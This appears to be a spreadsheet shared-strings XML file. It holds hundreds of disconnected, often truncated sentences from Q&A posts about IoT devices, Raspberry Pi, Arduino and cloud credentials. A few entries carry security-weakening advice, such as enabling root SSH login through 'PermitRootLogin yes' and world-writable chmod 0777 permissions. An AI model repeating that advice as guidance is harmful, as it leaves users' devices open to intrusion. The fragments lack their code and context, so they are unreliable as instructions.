  <si>
    <t>POST GZIP Data with NodeJS
Also you can do this in Node.JS with the following example.</t>
  </si>
  <si>
    <t>Login in through Facebook/Google
Here you have two options either to use AWS Cognito or go for Independent Google/Facebook login.</t>
  </si>
  <si>
    <t>But only use this for non-safetycritical projects.</t>
  </si>
  <si>
    <t>See the gRPC SECURITY.md documentation.</t>
  </si>
  <si>
    <t>Does XYZ online service save my users data?</t>
  </si>
  <si>
    <t>If all external access is guaranteed to come through the mutator, then these steps cannot be bypassed.</t>
  </si>
  <si>
    <t>I have used the command : chmod 0777 /dev/ttyUSB0  to give permissions .</t>
  </si>
  <si>
    <t>I have been able to get the ethernet shield working.</t>
  </si>
  <si>
    <t>This however, gives an authentication error:</t>
  </si>
  <si>
    <t>64) of SIM800 module with my PIC microcontroller to know whether my module is registered or not?</t>
  </si>
  <si>
    <t>How can I give it the appropriate permissions?</t>
  </si>
  <si>
    <t>When I run this code, the button press is not registered at all.</t>
  </si>
  <si>
    <t>If you're into abusing IO, the soundcard.</t>
  </si>
  <si>
    <t>Integrity: No node decides twice.</t>
  </si>
  <si>
    <t>I am not able to find out any documentation on how to take backup of Identity Registry from primary and upload it in secondary.</t>
  </si>
  <si>
    <t>When the application calls  the Band SDK displays a dialog message to the user to obtain that consent.</t>
  </si>
  <si>
    <t>Edit: I finally found this discussion debating whether a truecrypt container could be synced via rsync.</t>
  </si>
  <si>
    <t>SQLite can't create the journal, so it opens in read-only mode to prevent possible corruption.</t>
  </si>
  <si>
    <t>That way you can update your customers' firmware if you end up finding any bugs later.</t>
  </si>
  <si>
    <t>After calling delete the memory object pointed to is invalid and should no longer be used.</t>
  </si>
  <si>
    <t>I want to make my webpage secure so I found and ran this command</t>
  </si>
  <si>
    <t>I am trying to install google assistant on my raspberry pi 3.I am following google assistant SDK for device but I am unable to see the device registration in my Action on google</t>
  </si>
  <si>
    <t>a basic credential that allows the thing to at least publish a pairing number every few seconds?</t>
  </si>
  <si>
    <t>I've lifted code from a Microsoft Blog on the subject (albeit aimed at UWP on the Xbox), but my app seems unable to detect any cameras at all.</t>
  </si>
  <si>
    <t>However, if I use credentials generated by Cognito for a logged in user I am unable to do so.</t>
  </si>
  <si>
    <t>Also there's common issue - fuses corruption.</t>
  </si>
  <si>
    <t>If this is not what
   you want, please write a subnet declaration 
   In your dhcpd.conf file for the network segment
   to which interface eth0 is attached.</t>
  </si>
  <si>
    <t>Issues and what I have tried: 
When I try to activate the SSL module and run the command:  and sudo a2enmod default-ssl I get command not found.</t>
  </si>
  <si>
    <t>I finally found the problem : on serverBackup, userBackup wasn't the owner of authorized_keys... that's all ;).</t>
  </si>
  <si>
    <t>1) Allow SSH
in boot settings you allow SSH as it is turned off by default.</t>
  </si>
  <si>
    <t>For information about saving credentials in a vault.</t>
  </si>
  <si>
    <t>It requires modified files to contain a prominent notice that they have been altered.</t>
  </si>
  <si>
    <t>Libnids is an implementation of an E-component of Network Intrusion Detection System.</t>
  </si>
  <si>
    <t>I would like to read it and use it as part of a hashing algorithm.</t>
  </si>
  <si>
    <t>With STK500, I get an error that says:
Timeout while trying to access AVRdude programmer"
Is there a solution?</t>
  </si>
  <si>
    <t>and the raspberry pi should keep a credential key inside its memory for the device authentication.</t>
  </si>
  <si>
    <t>I also currently return the commandString value to the web ui too to verify it and it looks okay.</t>
  </si>
  <si>
    <t>I re-loaded my device on the xively website and got a new API key and number as well.</t>
  </si>
  <si>
    <t>I read somewhere that pygame is not thread safe.</t>
  </si>
  <si>
    <t>I am using OpenCV 2.4.8 to create an Application which will detect the Guns.</t>
  </si>
  <si>
    <t>And a few more params like last login time etc.</t>
  </si>
  <si>
    <t>Customers can be both "thing" owners or data consumers.</t>
  </si>
  <si>
    <t>The device name defined in gatt.xml file can always be detected on the iOS app.</t>
  </si>
  <si>
    <t>I have added permissions in the manifest file, but still the output is showing : .</t>
  </si>
  <si>
    <t>Then I tried the same for a Raspberry Pi device, and again the device agent failed to be downloaded.</t>
  </si>
  <si>
    <t>I tried many codes from many sites but didn't obtain the result.</t>
  </si>
  <si>
    <t>Authentication failed - Invalid credentials provided.</t>
  </si>
  <si>
    <t>This is how I run the cron:
All the folders and files are owned by root so there shouldn't be any write permission issues.</t>
  </si>
  <si>
    <t>After login with the AWS credentials I'm connecting to AWS IoT device like 
Then once the user logout from the app using AWS Cognito using
Then after logout I want to disconnect the the AWS IoT device as well.</t>
  </si>
  <si>
    <t>Moreover I used the AWS credential to connect the AWS IoT device, and once I logout from Cognito then the device should have been automatically disconnected as well I think.</t>
  </si>
  <si>
    <t>Also have given permission
I also tried using SSH client the same error pops out.</t>
  </si>
  <si>
    <t>It is about controlling the lock of the house along with its lighting from your Android phone.</t>
  </si>
  <si>
    <t>The device has RTOS os (not the aws enhanced one) and a propriety ble module.</t>
  </si>
  <si>
    <t>I am intending to POST Nest API to get the access token with ESP8266 or Arduino.</t>
  </si>
  <si>
    <t>Now as I read, SSL certificates expire in 3 years.</t>
  </si>
  <si>
    <t>It seems raspbian does not support HID over Gatt, which means that I need to implement/mimic a minimal HID over GATT behaviour using python.</t>
  </si>
  <si>
    <t>I see 2 ways:
1) export binary from arduino-ide to toolchain and encrypt this.</t>
  </si>
  <si>
    <t>What is the best way to get a certificate arn attached to a thing?</t>
  </si>
  <si>
    <t>Individually the keys register correctly.</t>
  </si>
  <si>
    <t>Now here comes my question (sorry if it's a silly one): How, in what format do I save the certificate?</t>
  </si>
  <si>
    <t>I fixed this by getting rid of the need to be root to access these devices.</t>
  </si>
  <si>
    <t>You are creating a software that can analyse any data that can come over USB.</t>
  </si>
  <si>
    <t>FYI, here is my command for the "server" :
sudo pand -i 00:1A:7D:DA:71:14 --listen --master --role=NAP
And for the "client":
sudo pand --nodetach --connect 00:1A:7D:DA:71:14
Then you can just use ifconfig, ping, ssh... usual stuff.</t>
  </si>
  <si>
    <t>Try something like this:
I don't have a wifi or ethernet shield I cannot test, so I don't know if your lib will skip the http headers.</t>
  </si>
  <si>
    <t>On modern Linux operating systems such as Raspbian USB devices are registered as device nodes in .</t>
  </si>
  <si>
    <t>EEPROM is good if you want access the data after reboot.</t>
  </si>
  <si>
    <t>Doing this is strongly discouraged, as it can present serious security risks.</t>
  </si>
  <si>
    <t>This is to make sure you have the right credentials setup e.g.</t>
  </si>
  <si>
    <t>Here's a blog post I wrote that details everything you need to do to generate the SAS token.</t>
  </si>
  <si>
    <t>I learned that actually you don't need a 'thing' to connect to AWS IoT, just a certificate will do; and that you can create elements on AWS IoT service by code.</t>
  </si>
  <si>
    <t>The reason you see them on ARM and not IA-32 is, on Intel's IA-32 the cpuid instruction is non-privileged.</t>
  </si>
  <si>
    <t>Also, I don't really understand the use-case of Cognito Identity ID.</t>
  </si>
  <si>
    <t>My suspicion is my PI has a corrupt file which is causing the upgrade to fail.</t>
  </si>
  <si>
    <t>Maybe it has to do with negotiation or credentials for the first operation.</t>
  </si>
  <si>
    <t>You should check if the upgraded device has provided Voice Permission from Cortana.</t>
  </si>
  <si>
    <t>Note that the source file is config1.yaml which is the same as config.yaml except that it has read permissions for everyone not just root.</t>
  </si>
  <si>
    <t>Maybe there were some corrupted files, but the system repaired them after a few reboots.</t>
  </si>
  <si>
    <t>It seems your partition key may be case sensitive.</t>
  </si>
  <si>
    <t>A SIM card is a chip that is used to identify and authenticate subscribers on Mobile devices</t>
  </si>
  <si>
    <t>SecurityException indicates a security violation and is thrown when a security error is detected.</t>
  </si>
  <si>
    <t>As3 Crypto is a cryptography library written in Actionscript 3 that provides several common algorithms.</t>
  </si>
  <si>
    <t>Use the [security], [cryptography] or [credentials] tag instead.</t>
  </si>
  <si>
    <t>Tracking last login time.</t>
  </si>
  <si>
    <t>It has to be applied to a linux kernel to enable kernel debugging.</t>
  </si>
  <si>
    <t>On iOS devices, making a device into a rooted devices is given the term jailbreak.</t>
  </si>
  <si>
    <t>CMSIS-DAP: A USB to Debug Access Port protocol and reference firmware implementation.</t>
  </si>
  <si>
    <t>Most of the time, rooting a device voids its warranty.</t>
  </si>
  <si>
    <t>The QIF format does not allow a user to mark the currency in which a transaction was completed.</t>
  </si>
  <si>
    <t>How dangerous is it to access an array out of bounds?</t>
  </si>
  <si>
    <t>Support for passworded and encrypted installs.</t>
  </si>
  <si>
    <t>The UI Spy tool is obsolete and no longer available.</t>
  </si>
  <si>
    <t>I've verified the IP address assigned to the Arduino.</t>
  </si>
  <si>
    <t>I have seen a few things online, but all of them are hacks.</t>
  </si>
  <si>
    <t>reading the WiFi shield's MAC-address or scanning for networks near me.</t>
  </si>
  <si>
    <t>I assumed it disables the aps layer acknowledgement and the additional aps retries.</t>
  </si>
  <si>
    <t>But now, the Uno couldn't communicate with the WiFi shield whether it's plug in with USB or with a 9V battery.</t>
  </si>
  <si>
    <t>This is what I have thought up based on what I researched:
Can someone verify?</t>
  </si>
  <si>
    <t>I would like to have some sort of security, in that I don't want anyone else to be able to contact my RPi and operate it.</t>
  </si>
  <si>
    <t>It is possible that my Apache web server doesn't have the permissions to access that file, and if so, how would I be able to adjust stuff so that it does?</t>
  </si>
  <si>
    <t>And when it detects intrusion, a camera must be triggered.</t>
  </si>
  <si>
    <t>The current code I have to do this is:
I am basing this code off of the blog post Android Arduino Switch with a TinyWebDB hack, but this code is for an Ethernet shield.</t>
  </si>
  <si>
    <t>An Arduino Leonardo gets detected in Device Manager, but then it gets disconnected.</t>
  </si>
  <si>
    <t>Does anybody know how to have multiple buttons being registered?</t>
  </si>
  <si>
    <t>I've tried a few hacky methods, but none of them are reliable enough.</t>
  </si>
  <si>
    <t>With the use of an external Python module (qr-tools), the Raspberry Pi can automatically decode the QR-code.</t>
  </si>
  <si>
    <t>Trying to give chmod permissions over the /usr/ files to my login (pi), I made a mistake, confusing "-" with "+".</t>
  </si>
  <si>
    <t>I'm using identical code on both devices with an LED to verify heartbeat.</t>
  </si>
  <si>
    <t>I want to write the key to the tag for authentication purpose.</t>
  </si>
  <si>
    <t>Each Pi contains its own key that it uses to verify with the web service.</t>
  </si>
  <si>
    <t>i'm just asking if it is possible to write-protect the arduino from overwriting.</t>
  </si>
  <si>
    <t>Is there any possibility to obtain IP by DHCP to my server program?</t>
  </si>
  <si>
    <t>When we connect it, the MPU6050 gives invalid output.</t>
  </si>
  <si>
    <t>If I use
in the script, for each Pi, it prompts the user for a password 4 times.</t>
  </si>
  <si>
    <t>To connect the Xbee to Serial I created a cable connecting the outer pins together, allowing me to flash the firmware of the Xbee.</t>
  </si>
  <si>
    <t>I wrote a GUI using python tkinter, it runs normally in PC ( when I use ssh to control   Raspberry) but always cause system crash when running in Raspberry pi.</t>
  </si>
  <si>
    <t>Can I share my wireless internet with raspberry via SSH?</t>
  </si>
  <si>
    <t>I am connected to the Raspberry via ssh so I have to have either ethernet or wifi active to access the computer--I am currently using ethernet.</t>
  </si>
  <si>
    <t>In the 3rd step, I send the PWD_AUTH command with the INDATAEXCHANGE code.</t>
  </si>
  <si>
    <t>And how can I improve the code to get into the Authenticated state?</t>
  </si>
  <si>
    <t>I'm trying to open an SSH client session from my Android app.</t>
  </si>
  <si>
    <t>In the encoder output port, a callback is registered and at each callback, the buffer data is appended to a file stream.</t>
  </si>
  <si>
    <t>So directory /tmp and the parent directory of the file.py and stuff.db are with full permissions.</t>
  </si>
  <si>
    <t>I read openssl is one way of encrypting single files.</t>
  </si>
  <si>
    <t>Im currently doing a project which is to simulate an alarm system using a raspberry pi and arduino.</t>
  </si>
  <si>
    <t>This message will be a unique id that will register the device inside of mongodb.</t>
  </si>
  <si>
    <t>I looked in the 802.15.4 specification how to decrypt the AES-CTR and I think that I don't understand how the nonce is build because my decryption doesn't work.</t>
  </si>
  <si>
    <t>im trying  to  use  the I2C-0 on RPI 2   but when  i run   i2cdetect -y 0   nothing  appears    .i pulled up  the  27 and  28   pin   to 3V3  using  4K7  resistors   and  no device detected.</t>
  </si>
  <si>
    <t>I have removed all the twitter credentials.</t>
  </si>
  <si>
    <t>I create a credential object.</t>
  </si>
  <si>
    <t>I know that in javascript you can't write a text files because of security issues.</t>
  </si>
  <si>
    <t>Using this, I can see an ip of 169.stuff get generated for my Pi, which is a private ip.</t>
  </si>
  <si>
    <t>Are there any that can detect a key being pressed and a key being released?</t>
  </si>
  <si>
    <t>I got an issue with reconnection to my BLE device.</t>
  </si>
  <si>
    <t>I don't understand what credentials to use either relative to Bluemix.</t>
  </si>
  <si>
    <t>I have a hardware device, which acts as an Access point.</t>
  </si>
  <si>
    <t>Is there a way to communicate to the device (which is an Access point) without turning off the mobile data.</t>
  </si>
  <si>
    <t xml:space="preserve">
I get the error "type argument of unary '*' (have 'int')" when I try to verify the code and have no idea what it means.</t>
  </si>
  <si>
    <t>(Apparently the default SSH and networking is a relatively new feature of Raspbian?</t>
  </si>
  <si>
    <t>At the moment, I have to enter the IP-Address manually.</t>
  </si>
  <si>
    <t>Better yet, please explain the procedure for changing the firmware.</t>
  </si>
  <si>
    <t>Can someone verify/comment on my thoughts on this?</t>
  </si>
  <si>
    <t>With smart config I can transmit the SSID and password for the access point which that the ESP8266 should connect.</t>
  </si>
  <si>
    <t>Can I use ssh from a web browser to load the rails server process?</t>
  </si>
  <si>
    <t>On raspbian , I can't run a program linked with libcrypto from gdb.</t>
  </si>
  <si>
    <t>I'd like it to simply fade in the information, keep it there for a few seconds and then have it fade out again (at which point the system becomes available again to have someone else login or logout).</t>
  </si>
  <si>
    <t>I read something about the phone bok access protocol (PBAP).</t>
  </si>
  <si>
    <t>I have to use it in a corporate network, so that a proxy setting is crucial.</t>
  </si>
  <si>
    <t>The problem is that if the user's request is an HTTPS website such as Facebook, Google or any others, obviously the packet can't be read.</t>
  </si>
  <si>
    <t>This is often an indication that other memory is corrupt
The code is as follows:</t>
  </si>
  <si>
    <t>However, I'm getting an "Imported Unrecognized Type: wiotp-credentials" error when I refresh Node-RED.</t>
  </si>
  <si>
    <t>We then looked into Shared Access Policies and tried different settings.</t>
  </si>
  <si>
    <t>Can someone tell me if it tutorial work to make TrustZone on Raspberry ?</t>
  </si>
  <si>
    <t>The program currently just get 1 reading when user enter a keystroke.</t>
  </si>
  <si>
    <t>Is that any different or safer than source or are they essentially the same?</t>
  </si>
  <si>
    <t xml:space="preserve">
I don't understand this simple code that is supposly certified doesn't work.</t>
  </si>
  <si>
    <t>So in otherwords I can manually open the file on my Mac so its not an access issue.</t>
  </si>
  <si>
    <t>So inside the docker container, u4vl will try to register a user space driver.</t>
  </si>
  <si>
    <t>After successful compilation of DT, raspberry pi is not allowing me to log in to board.</t>
  </si>
  <si>
    <t>I have a button attached to the device and what I want to do is basically a manual authentication.</t>
  </si>
  <si>
    <t>Now I'm trying to do the same for a Host Hvac device (I looked at the Hvac example for the MW302 as a reference), but I'm not able to register the device with ./out/host/examples/hvac/hvac -r xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.</t>
  </si>
  <si>
    <t>Edit 1: I also changed some permissions with 
chmod 600 -R /etc/ssh 
on the Raspberry pi, but that didn't do anything either.</t>
  </si>
  <si>
    <t>So my question is, does arduino have protections for the computer's USB port?</t>
  </si>
  <si>
    <t>I have a payload (encrypted) and kay value pair in HEX.</t>
  </si>
  <si>
    <t>In the code I want to read the analog pin when I enter a key.</t>
  </si>
  <si>
    <t>I have already successfully connected embedded devices using certificates with policies.</t>
  </si>
  <si>
    <t>How would I do that, and also HOW can I send that detected information to another raspberry pi?</t>
  </si>
  <si>
    <t>The problem is, My network has proxy settings.</t>
  </si>
  <si>
    <t>I changed the admin password in WSO2IOT 3.0.0 and I got an error after rebooting the wso2iot server.</t>
  </si>
  <si>
    <t>It I comment out the password portion the SSID will work.</t>
  </si>
  <si>
    <t>Would they be treated as private API?</t>
  </si>
  <si>
    <t>I'm coding a ESP8266 wifi module so that it will register automatically to a MQTT server.</t>
  </si>
  <si>
    <t>We tried to register also http://example.pl:80/riotcallbackinfo url, but with no success.</t>
  </si>
  <si>
    <t>I wrote a code with opencv on python 3, but the times between frames is ~0.075
nmap my ip-camera's
when I try streaming with OMXPlayer
omxplayer rtsp://192.168.0.88:554/user=admin&amp;password=&amp;channel=1&amp;stream=0.sdp?</t>
  </si>
  <si>
    <t>I was trying to sent encrypted info from server to ESP8266 wis nodemcu firmware.</t>
  </si>
  <si>
    <t>When I compile the program using the verify button.</t>
  </si>
  <si>
    <t>I tested another i2c device (EEPROM) and got the device address detected.</t>
  </si>
  <si>
    <t>Do you think that the interrupts for the stepper will disrupt the Ethernet communication or vise-versa?</t>
  </si>
  <si>
    <t>From what I can see we are registering to our EVPH correctly but let me know if anyone would like to view that code as well.</t>
  </si>
  <si>
    <t>I tested a-lot of codes but none of them worked to connect android to raspberry pi.</t>
  </si>
  <si>
    <t>It wasn't related to Android Services and Permissions.</t>
  </si>
  <si>
    <t>But when I access the page with embedded credentials, e.g.</t>
  </si>
  <si>
    <t>in aws iot- 
with boto3 (python) I want to check if a certificate has attached things to it.</t>
  </si>
  <si>
    <t>I also tried adding "git@localhost" as the username for the credentials.</t>
  </si>
  <si>
    <t>I am trying to send a message named "ringdoor" from the python client to the android TCP server.</t>
  </si>
  <si>
    <t>Now when a new device certificate is issued in device and when it do the JITR I would like to revoke the old certificate in JITR Lambda function.</t>
  </si>
  <si>
    <t>I have HDMI display which has corrupted EDID checksum and its working with other ARM board with work around.</t>
  </si>
  <si>
    <t>I used  to generate my root certificate and 
to verify .</t>
  </si>
  <si>
    <t>I am following this AWS GUIDE on creating self-signed certificates.</t>
  </si>
  <si>
    <t>Here is a screenshot of my Credentials Node and one of my IOT Out Node.</t>
  </si>
  <si>
    <t>The editor just loads without asking me for the username and the password.</t>
  </si>
  <si>
    <t>I edited credentials.lua to match my SSID and password.</t>
  </si>
  <si>
    <t>I am working with an MQTT Python client and I want to settle up Device Self-signed certificate option.</t>
  </si>
  <si>
    <t>I have given all the permissions to the UWP app (internet, and all other after that).</t>
  </si>
  <si>
    <t>I am trying a new thing so I will put two simple codes I am working on right now.</t>
  </si>
  <si>
    <t>So when I authenticate with keyA an attempt to read the block 5 lead to an error.</t>
  </si>
  <si>
    <t>However I am having no luck connecting to a secure API.</t>
  </si>
  <si>
    <t>As I don't normally use linux I don't fully understand the permissions which I am sure is what is causing this issue.</t>
  </si>
  <si>
    <t>If any one provide MQTT over SSL/TLS with 3 certificate AWS (ca,cert,private) android code.</t>
  </si>
  <si>
    <t>Below code i'm using to register devices into Azure IoTHub 
I want to test for around 15000  devices so  .</t>
  </si>
  <si>
    <t>To verify my program ( It seems to be right from displaying the waveform.</t>
  </si>
  <si>
    <t>Broker Address, Broker Port &amp; Client ID) and the user credentials!</t>
  </si>
  <si>
    <t>I have a raspberry pi that is behind a NAT and want to somehow ssh to it through, for example, an AWS t3.micro instance, when I'm not in the local network.</t>
  </si>
  <si>
    <t>They can connect to the platform using the same credentials, but only one of them is connected, disconnecting after some seconds and vice versa.</t>
  </si>
  <si>
    <t>I want to create another simulated device with same certificate and enroll in group.</t>
  </si>
  <si>
    <t>As I am not that familiar with certificate handling in Mono, i have no idea where to look for a sulution.</t>
  </si>
  <si>
    <t>I downloaded master firmware and put it under my user directory and i assign all permissions also to Eveyone.</t>
  </si>
  <si>
    <t>Check object key, region and/or access permissions.</t>
  </si>
  <si>
    <t>Here is the code that I think is related: 
Could  be a way to get the detected class?</t>
  </si>
  <si>
    <t>Call Networks with correct credentials now.</t>
  </si>
  <si>
    <t>One strategy is to create a new Thing for each User, with its own certificate.</t>
  </si>
  <si>
    <t>But the online help sources mentions that all the security attestation should be done by the manufacturer.</t>
  </si>
  <si>
    <t>Using SSH, I downloaded Webmin and ran it on port 10000, but I cannot access it on my browser at raspberrypi:10000.</t>
  </si>
  <si>
    <t>-file works when it's created directly in /etc/cron.d/:
But it doesn't work when I copy/move it to the directory:
sudo cp ./my_cron /etc/cron.d/my_cron
ls -l /etc/cron.d outputs the same permissions both times: -rw-r--r--.</t>
  </si>
  <si>
    <t>How to verify Device with registry level ca certificates for more security?</t>
  </si>
  <si>
    <t>it is getting IP address but internet browsing is not possible.</t>
  </si>
  <si>
    <t>That is, being able to use my 'login' view function without bumping into errors every time I get redirected.</t>
  </si>
  <si>
    <t>This happens just after registering the GPS Driver.</t>
  </si>
  <si>
    <t>The address obtained by running ifconfig on the linux instance isn't pingable from my mac.</t>
  </si>
  <si>
    <t>The point is that I can NOT efectively comunicate my PC and Pyboard, so I wonder if there is a better way to share this information.</t>
  </si>
  <si>
    <t>My problem is just the first time you connect to the RPi to configure the wifi network.</t>
  </si>
  <si>
    <t>The device is registered (connection allowed) and I see the IoT API request counts on the dashboard.</t>
  </si>
  <si>
    <t>This is what I've done so far:
This works as a charm when I have a known ssid and relative password, but now my esp8266NodeMCU wifi credentials are setted through wifiManager: WiFiManager so they are no more constants.</t>
  </si>
  <si>
    <t>I could not start a gRPC server (written in Java) on Raspberry Pi with SSL security enabled.</t>
  </si>
  <si>
    <t>I am wondering if some major change in the firmware is preventing me to connect again.</t>
  </si>
  <si>
    <t>More Information : 
The thingId in Ditto is org.eclipse.ditto:4816,
Tenant Id in Hono - tenantAdapters,
Device Registered in Hono - 4816 (tenantAdapters),
Auth Id of the device - sensor0101,
ConnectionId between Hono and Ditto - Gal-Connection-10</t>
  </si>
  <si>
    <t>Now, the module answers to my commands but it doesn't register into the network.</t>
  </si>
  <si>
    <t>I was trying to understand the code of fingerprint module.</t>
  </si>
  <si>
    <t>It is already registered with the IoT Hub and sends data correctly.</t>
  </si>
  <si>
    <t>Specifically, I need to enrol device programmatically in C# at backend via DPS for Symmetric Key.</t>
  </si>
  <si>
    <t>However, with my codes, they communicate just 2 or 3 times and stop.</t>
  </si>
  <si>
    <t>I will send unique-complicated-ID every 1-5 seconds from device.</t>
  </si>
  <si>
    <t>Well here's a bug
At this point  is an uninitialised variable.</t>
  </si>
  <si>
    <t>With this feature enabled, a chip erase command will not erase the EEPROM.</t>
  </si>
  <si>
    <t>I often use a serial spy program to look at the conversation between two devices.</t>
  </si>
  <si>
    <t>Make sure to have the latest firmware.</t>
  </si>
  <si>
    <t>What if someone rips your device open the reads the keys, is that a problem?</t>
  </si>
  <si>
    <t>If you start an ssh session with  or -X it'll enable X11 forwarding.</t>
  </si>
  <si>
    <t>And then create a library_private.h that has all of your secret stuff in it.</t>
  </si>
  <si>
    <t>Chrome supports ntlm http auth scheme, you can read more about it here.</t>
  </si>
  <si>
    <t>My suggestion would be to spy on the wire.</t>
  </si>
  <si>
    <t>Jason, if you use a automount, and define a short commit time on automount configuration, the removal of flash card is secure.</t>
  </si>
  <si>
    <t>You can't re-enable the USB connection because it will reboot your Arduino.</t>
  </si>
  <si>
    <t>You should POST the data with the Ethernet/WebClient:
http://playground.arduino.cc/Code/WebClient
http://forum.arduino.cc/index.php?topic=145277.0
What do you mean by username and password?</t>
  </si>
  <si>
    <t>Communication with authentification chip is handled by the BT module.</t>
  </si>
  <si>
    <t>It seems that cur_node points to an invalid address.</t>
  </si>
  <si>
    <t>If the key must be stored on the Pi somehow, and anything on the Pi can be read, you're out of luck.</t>
  </si>
  <si>
    <t>This prevented that other driver from breaking and/or a device/board malfunction.</t>
  </si>
  <si>
    <t>I am afraid this is a bit sticky to debug, but the symptoms point at something getting corrupted in memory.</t>
  </si>
  <si>
    <t>That was done to prevent spy-like apps/viruses and termination too ;)</t>
  </si>
  <si>
    <t>As for stuck at before login, that is very likely due to the while loop.</t>
  </si>
  <si>
    <t>Also keep in mind that your build of ssh might not have all the ciphers you see used elsewhere.</t>
  </si>
  <si>
    <t>If so, I'd define a preprocessor macro which inserts invalid code, like
or you can play with the #error preprocessor directive</t>
  </si>
  <si>
    <t>The solution is to access hardware registers.</t>
  </si>
  <si>
    <t>A KeyListener will only generate KeyEvents when the component it is registered to IS focusable and HAS focus.</t>
  </si>
  <si>
    <t>If you write them as a WAV file (possibly using this to help you), you will be able to open them in Audacity.</t>
  </si>
  <si>
    <t>So we have to program hardware registers ourself.</t>
  </si>
  <si>
    <t>The Yun uses Bonjour services (port 5353) for auto-discovery on a wireless network.</t>
  </si>
  <si>
    <t>Later on you can have a problem with detecting i2c devices on the bus.</t>
  </si>
  <si>
    <t>The library was probably corrupted when you rebooted.</t>
  </si>
  <si>
    <t>This private API is no longer available.</t>
  </si>
  <si>
    <t>No, you don't need to register the profile with it's UUID's.</t>
  </si>
  <si>
    <t>This means that you can automatically renew the Let's Encrypt certificates.</t>
  </si>
  <si>
    <t>There are also security features involved which complicates it even further.</t>
  </si>
  <si>
    <t>I saw this post that may help you : https://groups.google.com/forum/#!topic/pi4j/T30EUL2Z10I
As I do not own this device, so I cannot verify by myself.</t>
  </si>
  <si>
    <t>When i wanted to write watchdog device from C++ program i got same error.</t>
  </si>
  <si>
    <t>If you successfully connected to the device, you should see the IP address of your device before the prompt.</t>
  </si>
  <si>
    <t>&lt;&lt; Make the RCU Read unlock
        ret = send_sig_info(SIG_TEST, &amp;info, stTask);    //!</t>
  </si>
  <si>
    <t>Every time you update the browser or the JRE, you're going to have to re-allow all the permissions that will let you do this.</t>
  </si>
  <si>
    <t>You will have to create a device type and register a device, then something like this could work.</t>
  </si>
  <si>
    <t>So you just write the decryption algorithm as you would with any other language.</t>
  </si>
  <si>
    <t>Don't think there's encryption availabe for normal arduino boards, at least not what I've seen.</t>
  </si>
  <si>
    <t>Your hostname  is registered through mDNS, but mqtt query a DNS to resolve the hostname.</t>
  </si>
  <si>
    <t>The process of registering card ids can also be done with some code I am sure.</t>
  </si>
  <si>
    <t>For that you want to support device identification in the device's firmware.</t>
  </si>
  <si>
    <t>I tried connecting from Paho GUI Client (Which I have validated already connecting to azure with my credentials - Works!!)</t>
  </si>
  <si>
    <t>Appeared to be something with proxy settings gone wrong.</t>
  </si>
  <si>
    <t>To do this, you should create an IoT platform service and register your devices rather than using Quickstart.</t>
  </si>
  <si>
    <t>Wildcard here is also not supported to register for all types.</t>
  </si>
  <si>
    <t>I don't think this is possible no because the whole point of a MAC address is that it is unique to each device to allow it to be identified.</t>
  </si>
  <si>
    <t>To detect whether the internet is reachable from your device you need to try to connect to a server out there.</t>
  </si>
  <si>
    <t>Sometimes, they are raspberry pi (and similar) with default login data.</t>
  </si>
  <si>
    <t>Unless you have code written which try to keep reconnecting to its last connected device, none of the device will try to connect even if they are in range.</t>
  </si>
  <si>
    <t>Then you can enter credential information.</t>
  </si>
  <si>
    <t>gcc $1.c -o $1
./$1
3- give this file permissions by this command :
sudo chmod 755 ccompiler ; #ccompiler or the name you chose .</t>
  </si>
  <si>
    <t>Keep in mind that you are not logging the "keyboard" in your python code.</t>
  </si>
  <si>
    <t>The device address (ex: 00:72:02:97:33:2C) can be obtained from paired devices (or by allowing for discovery), see Android example app for more on that.</t>
  </si>
  <si>
    <t>You should validate the time the user enters.</t>
  </si>
  <si>
    <t>This way the first time you boot it up, its ready to go and you can connect via SSH.</t>
  </si>
  <si>
    <t>Make sure that your Android device is connected to your Wi-Fi and get the Wi-Fi IP address.</t>
  </si>
  <si>
    <t>The options are:
Either use underlying TCP security (SSL) by presharing the certificate.</t>
  </si>
  <si>
    <t>So you will deploy an assisting firmware not the LabVIEW code as pointed out here.</t>
  </si>
  <si>
    <t>You can verify the same from your driver source code.</t>
  </si>
  <si>
    <t>Connect your Ethernet Shield to the Ethernet port on your computer.</t>
  </si>
  <si>
    <t>For that you must do:
passwd root
to set root password 
sudo nano /etc/ssh/sshd_config
And change PermitRootLogin to yes
reboot</t>
  </si>
  <si>
    <t>This can be omitted later one once functionality has been verified.</t>
  </si>
  <si>
    <t>As soon as the WLAN and ad-hoc networking shall be used, the Android must be rooted, which is not liked by all users.</t>
  </si>
  <si>
    <t>You would likely need to establish a network communication between the Raspberry Pi and the device.</t>
  </si>
  <si>
    <t>Open up flasher app and flash the firmware for Espruino.</t>
  </si>
  <si>
    <t>Otherwise this is probably an malconfigured kernel driver or a bug.</t>
  </si>
  <si>
    <t>If you'll own the domain name you should login to your registrar, then go to the manage DNS settings page.</t>
  </si>
  <si>
    <t>If you're getting this for every URL, it may be that your SIM has not been activated for Data.</t>
  </si>
  <si>
    <t>The protocols you mentioned are only possible AFTER you're part of the network.</t>
  </si>
  <si>
    <t>The sender should include some type of CRC checksum calculation with each chunk that the receiver could verify.</t>
  </si>
  <si>
    <t>Spotify actually has a protocol registered so you could do this to launch it:</t>
  </si>
  <si>
    <t>Use this tool to validate the sync response that is sent to the Google Assistant.</t>
  </si>
  <si>
    <t>https://nodemcu.readthedocs.io/en/master/en/modules/net/#netsocketon
Also, this function may help to verify the correctness of ip.</t>
  </si>
  <si>
    <t>by keeping a counter of how many things have been encrypted.</t>
  </si>
  <si>
    <t>And why we would see this in the logs...
2017-09-19 14:45:13: (INFO:AWSIoTPythonSDK.core.protocol.mqtt_core) Offline request detected!</t>
  </si>
  <si>
    <t>In Android Things, Firebase Authentication is supported.</t>
  </si>
  <si>
    <t>The serial hat I was using doesn't detect Parity errors.</t>
  </si>
  <si>
    <t>This happens because:-
Camera permission comes under dangerous permission list.</t>
  </si>
  <si>
    <t>The bluetooth-agent you mentioned is an agent for authentication that is available with older bluez versions.</t>
  </si>
  <si>
    <t>(not fully verified, but it fixed the problem)</t>
  </si>
  <si>
    <t>There are two authorizations need by a module at this time.</t>
  </si>
  <si>
    <t>However this is difficult to test and verify.</t>
  </si>
  <si>
    <t>I can't really verify your code as I don't have streaming setup with me.</t>
  </si>
  <si>
    <t>This means something bad happened inside the kernel.</t>
  </si>
  <si>
    <t>By default the connection security settings are on TLS with token so you need to use SSL.</t>
  </si>
  <si>
    <t>In BLE, authentication and encryption are bound with Characteristics (data).</t>
  </si>
  <si>
    <t>Whenever you define a thing in AWS IoT, a unique identifier will be assigned to your device in your AWS IoT account.</t>
  </si>
  <si>
